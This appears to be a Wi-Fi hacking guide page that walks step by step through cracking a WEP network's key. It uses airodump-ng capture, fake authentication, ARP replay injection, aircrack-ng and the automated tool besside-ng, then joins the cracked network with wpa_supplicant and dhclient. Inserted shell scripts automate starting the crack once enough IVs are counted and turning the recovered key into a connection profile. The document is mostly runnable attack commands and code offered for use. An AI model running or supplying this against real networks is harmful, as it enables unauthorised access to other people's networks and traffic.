
# WEP

### Manual Cracking WEP

You need to understand the goal. WEP encrypts every frame with RC4 keyed by the static WEP key plus a 24-bit Initialization Vector (IV) that is sent in the clear. The IV space is tiny and RC4's key scheduling leaks key bytes, so statistical attacks (FMS/KoreK, and the PTW attack aircrack-ng uses by default) recover the key once enough distinct IVs have been observed. Passive capture is slow on a quiet network, so we capture and re-inject frames to force the Access Point (AP) to emit a high volume of fresh IVs. Once we have enough IVs, aircrack-ng solves for the key.

#### Phase 1: Environment Setup

1. Put wlan6 into Monitor Mode (the interface numbering in this page's screenshots varies between `wlan0`, `wlan2` and `wlan6`; substitute your own adapter's name throughout):

```
airmon-ng start wlan6
```

*Note: This usually creates an interface named wlan6mon. Run `airmon-ng check kill` first (as in the besside-ng section below) so NetworkManager or a running wpa_supplicant cannot change channel or reset the card mid-capture.*

<figure><img src="/files/sQCMJnlcnvXRO19jIpgw" alt=""><figcaption></figcaption></figure>

***

#### Phase 2: The Attack Walkthrough (Multi-Tab)

**Tab A: Targeted Capture**

First, list the networks in range and note the target's BSSID and channel; the `ENC` column must read `WEP` for the rest of this walkthrough to apply.

```
airodump-ng --band abg wlan6mon
```

<figure><img src="/files/D7tZOvtgxydgO4KoYBI5" alt=""><figcaption></figcaption></figure>

This tab stays open to collect the IVs. Every encrypted data frame carries one, and aircrack-ng treats each as a "vote" for the most likely value of each key byte.

```
airodump-ng -c 6 --bssid 02:00:00:00:00:00 -w WEP_Capture --output-format pcap wlan6mon
```

* Monitor: Watch the `#Data` column. It counts captured data frames, each carrying a fresh IV. On an idle WEP network it barely moves; the next two tabs exist to make it climb fast.

<figure><img src="/files/1t6HlIcx9UoHDDerN9As" alt=""><figcaption></figcaption></figure>

**Tab B: Fake Authentication (essential when no clients are connected to the AP)**

We use wlan6mon to "introduce" ourselves to the AP as an associated station. An AP only accepts data frames from stations it has associated, so without this step (or spoofing the MAC of a real client) the AP silently drops our injected traffic and no new IVs are generated.

```
aireplay-ng -1 6000 -o 1 -q 10 -e SweetB-WEP -a 02:00:00:00:00:00 -h 02:00:00:00:01:00 wlan6mon
```

#### Command Breakdown

* `aireplay-ng`: The core tool used for 802.11 packet injection and generation.
* `-1 6000`: Fake Authentication mode. The `6000` is the delay in seconds before aireplay-ng re-authenticates, so the association is refreshed roughly every 6,000 seconds.
* `-o 1`: Send one packet per burst (the default, and what most APs expect).
* `-q 10`: Send a keep-alive every 10 seconds so the AP does not drop the association for inactivity.
* `-e SweetB-WEP`: The ESSID (name) of the target network.
* `-a 02:00:00:00:00:00`: The BSSID (MAC address) of the target Access Point.
* `-h 02:00:00:00:01:00`: Your source MAC address. This should be the actual MAC of the injecting interface (`wlan6mon` here), or change the card's MAC to match before starting; if the two differ, the AP's replies are addressed to a MAC the card does not hold and injection becomes unreliable.
* `wlan6mon`: The wireless interface you are using in monitor mode.
* **Success: Look for `Association successful :-) (AID: 1)`.** If the association keeps failing, the AP may be filtering MACs; reusing the MAC of a client that is already associated is the usual workaround.

<figure><img src="/files/CRcwCFWPVZRjxWuSZT4B" alt=""><figcaption></figcaption></figure>

The same attack with only the required parameters. Without `-h`, aireplay-ng uses the interface's own MAC; without `-e`, it picks the ESSID up from the AP's beacons:

```
sudo aireplay-ng -1 3600 -q 10 -a F0:9F:C2:71:22:11 wlan0mon
```

<figure><img src="/files/Ajdc1792JUZ3HYLcLOJC" alt=""><figcaption></figcaption></figure>

**Tab C: ARP Replay Attack**

This is the engine. It waits for an ARP request from an associated station, then re-injects that same frame to the AP over and over (at aireplay-ng's default rate of about 500 packets per second). The AP answers each replay with a freshly encrypted frame carrying a new IV, which is what drives `#Data` up. Replaying works because WEP has no replay protection: an old frame is accepted as readily as a new one.

```
aireplay-ng -3 -b 02:00:00:00:00:00 -h 02:00:00:00:01:00 wlan6mon
```

#### Command Breakdown

* `aireplay-ng`: The tool used for 802.11 packet injection.
* `-3`: Specifies the ARP Request Replay attack mode.
* `-b 02:00:00:00:00:00`: Sets the BSSID (MAC address) of the target Access Point.
* `-h 02:00:00:00:01:00`: Sets the source MAC address. It must be a station the AP accepts: your own interface's MAC after the fake authentication in Tab B, or the MAC of a real associated client.
* `wlan6mon`: The wireless interface you are using in monitor mode.
* Troubleshooting: the replay cannot start until it has seen at least one ARP request. If `#Data` isn't rising, generate one from a machine that is already on the WEP network (in a lab, e.g. `ping 192.168.8.5` from a connected client, where `192.168.8.5` is some host on that LAN), or wait for a real client to connect or renew its lease.

<figure><img src="/files/jqGfbZqIR9DylzApkYid" alt=""><figcaption></figcaption></figure>

Or use the long-form option name, which does the same thing:

```
sudo aireplay-ng --arpreplay -b F0:9F:C2:71:22:11 -h 02:00:00:00:00:00 wlan0mon
```

**Tab D: Cracking the Key**

You can run this while the other tabs are still working. aircrack-ng reads the capture airodump-ng is writing (airodump-ng appends `-01` to the prefix you gave with `-w`) and re-runs automatically as more IVs arrive.

```
aircrack-ng -b 02:00:00:00:00:00 WEP_Capture-01.cap
```

<figure><img src="/files/GkaRWeSrmUQP6IyqMpVH" alt=""><figcaption></figcaption></figure>

***

#### Expected Results

* IV Count: aircrack-ng re-runs the attack every 5,000 newly captured IVs until it finds the key. A 40-bit (marketed as 64-bit) key typically falls with tens of thousands of IVs; a 104-bit (128-bit) key needs more.
* Key Found: When successful, you will see `KEY FOUND! [ EA:BC:DE:F1:23 ]` (example key; 5 bytes means a 40-bit key, 13 bytes a 104-bit key).
* Decryption: It should report `Decrypted correctly: 100%`. The hex key with the colons removed is what you give to `wpa_supplicant` when connecting below.
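Tabs A to D leave you watching `#Data` by eye. As an added example (not code from this page or from the aircrack-ng project), the shell functions below read the CSV that airodump-ng writes next to the capture when it is run with `--output-format pcap,csv` (so `WEP_Capture-01.csv` beside `WEP_Capture-01.cap`), confirm the target really is WEP, and report its IV count so a script can start aircrack-ng once a threshold is crossed. The sample CSV contents, the 40,000-IV threshold and the 5-second polling interval are this example's assumptions, not figures from the page.

```shell
#!/usr/bin/env sh
# Added example: monitor airodump-ng's CSV for a WEP target's IV count.
# Not part of aircrack-ng; the CSV column layout below is the one
# airodump-ng writes, the sample data is constructed for this example.
#
# AP section layout of the CSV:
# BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher,
# Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
# Only columns before ESSID are used, so an ESSID containing commas is harmless.

# iv_count <csv> <bssid>: print the "# IV" column for the AP, or nothing if absent.
iv_count() {
  awk -F',' -v want="$2" '
    { gsub(/^[ \t]+|[ \t]+$/, "", $1)
      if (toupper($1) == toupper(want)) { gsub(/^[ \t]+|[ \t]+$/, "", $11); print $11; exit } }
  ' "$1"
}

# privacy <csv> <bssid>: print the Privacy column (WEP, WPA2, OPN, ...).
privacy() {
  awk -F',' -v want="$2" '
    { gsub(/^[ \t]+|[ \t]+$/, "", $1)
      if (toupper($1) == toupper(want)) { gsub(/^[ \t]+|[ \t]+$/, "", $6); print $6; exit } }
  ' "$1"
}

# enough_ivs <count> [threshold]: succeed once count >= threshold.
# 40000 is an assumed default for a PTW run; aircrack-ng itself retries
# every 5000 IVs, so the threshold only decides when a script starts it.
enough_ivs() {
  [ "${1:-0}" -ge "${2:-40000}" ]
}

# wait_for_ivs <csv> <bssid> [threshold]: live use. Poll the CSV airodump-ng
# is writing and return once the target has enough IVs, e.g.
#   wait_for_ivs WEP_Capture-01.csv 02:00:00:00:00:00 && \
#     aircrack-ng -b 02:00:00:00:00:00 WEP_Capture-01.cap
wait_for_ivs() {
  csv="$1"; bssid="$2"; threshold="${3:-40000}"
  [ "$(privacy "$csv" "$bssid")" = "WEP" ] || { echo "target is not WEP" >&2; return 1; }
  while :; do
    count="$(iv_count "$csv" "$bssid")"
    printf '%s IVs collected for %s\n' "${count:-0}" "$bssid"
    enough_ivs "${count:-0}" "$threshold" && return 0
    sleep 5
  done
}

# Constructed sample of WEP_Capture-01.csv (all values invented for this example).
SAMPLE_CSV="$(mktemp)"
cat >"$SAMPLE_CSV" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:00:00:00, 2024-01-01 10:00:00, 2024-01-01 10:12:41,  6,  54, WEP , WEP, ,  -38,      912,    48234,   0.  0.  0.  0,  10, SweetB-WEP, 
02:00:00:00:02:00, 2024-01-01 10:00:03, 2024-01-01 10:12:40,  6,  54, WPA2, CCMP, PSK,  -61,      240,        0,   0.  0.  0.  0,   7, Neighbr, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:00:01:00, 2024-01-01 10:01:10, 2024-01-01 10:12:41,  -30,    61200, 02:00:00:00:00:00, 
EOF

# Stand-alone demonstration against the constructed sample.
TARGET=02:00:00:00:00:00
printf 'privacy=%s ivs=%s\n' "$(privacy "$SAMPLE_CSV" "$TARGET")" "$(iv_count "$SAMPLE_CSV" "$TARGET")"
if enough_ivs "$(iv_count "$SAMPLE_CSV" "$TARGET")" 40000; then
  echo "enough IVs: start aircrack-ng"
else
  echo "keep injecting"
fi
```

`wait_for_ivs` refuses to run against a non-WEP BSSID, which catches the common mistake of pointing the replay at a neighbouring WPA2 network that happens to share the channel.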

### Automated WEP cracking with **besside-ng**

```
airmon-ng check kill
sudo besside-ng -c 3 -b F0:9F:C2:71:22:11 wlan2 -v
```

**1. `besside-ng` (Automated WEP/WPA Attack Tool)**

* A tool that **automatically** captures handshakes for WPA/WPA2 networks and **cracks WEP encryption** end to end: it handles the association, ARP replay and aircrack-ng run that the manual walkthrough above splits across four tabs. It is given the interface name as-is (`wlan2`, not `wlan2mon`) because it enables monitor mode itself. Captured WEP traffic is saved to `wep.cap` and the recovered key is recorded in `besside.log` in the working directory.

**2. `-c 3` (Target Channel 3)**

* This forces `besside-ng` to **only scan and attack Wi-Fi networks on channel 3**.
* Useful for **faster attack execution** instead of scanning all channels.

**3. `-b F0:9F:C2:71:22:11` (Target Specific BSSID)**

* **F0:9F:C2:71:22:11** is the **BSSID** (MAC address of the target router/AP).
* Ensures `besside-ng` attacks **only this specific access point** rather than scanning for all available networks.

**4. `wlan2` (Wireless Interface)**

* Specifies that `wlan2` is the **wireless adapter** being used.

**5. `-v` (Verbose Mode)**

* Enables **detailed output** for better tracking of the attack progress.

<figure><img src="https://wifi-hacking.cavementech.com/~gitbook/image?url=https%3A%2F%2F566300827-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FpRJWncf6N0vRLq29OrFf%252Fuploads%252FNXxik7hddQoTWS3T8ySx%252Fimage.png%3Falt%3Dmedia%26token%3Dd296c867-2f5b-4e24-be1b-07bf944bdee6&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=28650978&#x26;sv=2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://wifi-hacking.cavementech.com/~gitbook/image?url=https%3A%2F%2F566300827-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FpRJWncf6N0vRLq29OrFf%252Fuploads%252Fj8oTOLRAqA52m1roCcgy%252Fimage.png%3Falt%3Dmedia%26token%3D3648b4b8-a794-418d-9c08-78c91cc35ab3&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=d231bc6d&#x26;sv=2" alt=""><figcaption></figcaption></figure>

### Connecting to the cracked WEP Wifi Network

Once we have the key (the hex bytes from `KEY FOUND!`, without the colons) we can connect to the WEP network:

Create a configuration file to connect to the WEP network.

```
nano wep.conf
```

The content should look like this. `key_mgmt=NONE` selects plain WEP, `wep_key0` takes the key as unquoted hex (an ASCII key would be given in double quotes instead), and `wep_tx_keyidx=0` tells the driver to transmit with key slot 0.

```
network={
  ssid="wifi-old"
  key_mgmt=NONE
  wep_key0=11BB33CD55
  wep_tx_keyidx=0
}
```

Now we can connect to the WEP network with our configuration file. The interface must be back in managed mode first (`airmon-ng stop wlan2mon`, or use a second adapter); wpa_supplicant stays in the foreground here, so run the next command in another terminal, or add `-B` to send it to the background.

```
sudo wpa_supplicant -D nl80211 -i wlan2 -c wep.conf
```

We should try to retrieve an IP address from the DHCP server.

```
sudo dhclient wlan2 -v
```

<figure><img src="https://wifi-hacking.cavementech.com/~gitbook/image?url=https%3A%2F%2F566300827-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FpRJWncf6N0vRLq29OrFf%252Fuploads%252FNOn4OG7A6YYdFt3FtfsC%252Fimage.png%3Falt%3Dmedia%26token%3Dabd789d1-d665-401f-949f-fcbdc3846c00&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=560d4515&#x26;sv=2" alt=""><figcaption></figcaption></figure>
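The two halves of this page meet at the key: aircrack-ng prints it colon-separated, wpa_supplicant wants it as plain hex. As an added example (not the page's own code, and not from aircrack-ng or wpa_supplicant), these shell functions take the `KEY FOUND!` line from Tab D, strip the colons, check that the key is a valid 40- or 104-bit WEP key, and write the `wpa_supplicant` network block shown above before connecting. The aircrack-ng output sample, the SSID and the interface name are constructed for this example.

```shell
#!/usr/bin/env sh
# Added example: turn aircrack-ng's "KEY FOUND!" line into a wpa_supplicant
# WEP profile and connect. Not code from aircrack-ng or wpa_supplicant.

# extract_wep_key: read aircrack-ng output on stdin, print the key as
# upper-case hex without colons (what wep_key0= expects).
extract_wep_key() {
  sed -n 's/.*KEY FOUND! \[ *\([0-9A-Fa-f:]*\) *].*/\1/p' | tr -d ':' | tr 'a-f' 'A-F' | head -n1
}

# wep_key_bits <hexkey>: print 40 or 104 for a valid key length, fail otherwise.
# WEP-40 is 5 bytes (10 hex digits), WEP-104 is 13 bytes (26 hex digits).
wep_key_bits() {
  case "${#1}" in
    10) echo 40 ;;
    26) echo 104 ;;
    *)  return 1 ;;
  esac
}

# wep_conf <ssid> <hexkey>: print the wpa_supplicant network block for a WEP
# network. Refuses keys of the wrong length rather than writing a profile
# that the driver will reject at association time.
wep_conf() {
  wep_key_bits "$2" >/dev/null || { echo "bad WEP key length: ${#2} hex digits" >&2; return 1; }
  cat <<EOF
network={
  ssid="$1"
  key_mgmt=NONE
  wep_key0=$2
  wep_tx_keyidx=0
}
EOF
}

# connect_wep <iface> <ssid> <hexkey>: live use. The interface must be in
# managed mode (airmon-ng stop <iface>mon) before wpa_supplicant can use it.
connect_wep() {
  conf="$(mktemp)"
  wep_conf "$2" "$3" >"$conf" || return 1
  sudo wpa_supplicant -B -D nl80211 -i "$1" -c "$conf" && sudo dhclient -v "$1"
}

# Constructed sample of the tail of aircrack-ng's output (values invented).
SAMPLE_AIRCRACK_OUTPUT='
      [00:00:03] Tested 12 keys (got 48234 IVs)

             KEY FOUND! [ EA:BC:DE:F1:23 ]
	Decrypted correctly: 100%
'

# Stand-alone demonstration: key -> length check -> config text.
KEY="$(printf '%s\n' "$SAMPLE_AIRCRACK_OUTPUT" | extract_wep_key)"
printf 'recovered key %s (%s-bit)\n' "$KEY" "$(wep_key_bits "$KEY")"
wep_conf "SweetB-WEP" "$KEY"
# To actually join the network once wlan6 is back in managed mode:
#   connect_wep wlan6 SweetB-WEP "$KEY"
```

`extract_wep_key` works on saved output too (`aircrack-ng ... | tee crack.log` in Tab D, then `extract_wep_key < crack.log`), so the key never has to be retyped from a screenshot.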

{% embed url="<https://youtu.be/vcYTgJ6_mXE>" %}
